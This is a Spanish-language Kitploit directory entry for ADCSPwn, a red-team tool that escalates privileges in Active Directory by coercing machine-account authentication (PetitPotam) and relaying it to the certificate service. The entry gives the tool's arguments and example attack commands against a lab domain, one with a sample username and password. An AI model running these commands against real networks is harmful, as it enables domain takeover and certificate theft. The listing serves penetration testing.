Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ADCSPwn — Una herramienta para escalar privilegios en una red de Active Directory mediante la coerción de autenticación de cuentas de máquina y la retransmisión al servicio de certificados. | Kitploit
Herramientas/GitHubGitHub/bats3c/adcspwn
Escalada de PrivilegiosExplotaciónPruebas de PenetraciónAutenticaciónRed Teaming
GitHubbats3c/adcspwn

ADCSPwn

Una herramienta para escalar privilegios en una red de Active Directory mediante la coerción de autenticación de cuentas de máquina y la retransmisión al servicio de certificados.

Ver Repositorio
8781273hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ADCSPwn

Una herramienta para escalar privilegios en una red de Active Directory mediante la coerción de autenticación de cuentas de máquina (Petitpotam) y la retransmisión al servicio de certificados.

Uso

Ejecuta ADCSPwn en tu red objetivo.

root@kitploit:~
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec
Contributor: @424f424f -  Black Hills Information Security

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

Required arguments:
adcs            -       Esta es la dirección del servidor AD CS al cual se retransmitirá la autenticación.

Optional arguments:
secure          -       Usar HTTPS con el servicio de certificados.
port            -       El puerto en el que ADCSPwn escuchará.
remote          -       Máquina remota desde la cual se activará la autenticación.
username        -       Nombre de usuario para un contexto no perteneciente al dominio.
password        -       Contraseña para un contexto no perteneciente al dominio.
dc              -       Controlador de dominio para consultar las plantillas de certificados (LDAP).
unc             -       Establecer una ruta de callback UNC personalizada para EfsRpcOpenFileRaw (Petitpotam).
output          -       Ruta de salida para almacenar el crt generado en base64.

Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share

Créditos

  • @harmj0y y @tifkin_ por su documento técnico que detalla este problema.
  • @topotam77 por mostrar cómo se puede abusar de EfsRpcOpenFileRaw.
Descargar herramienta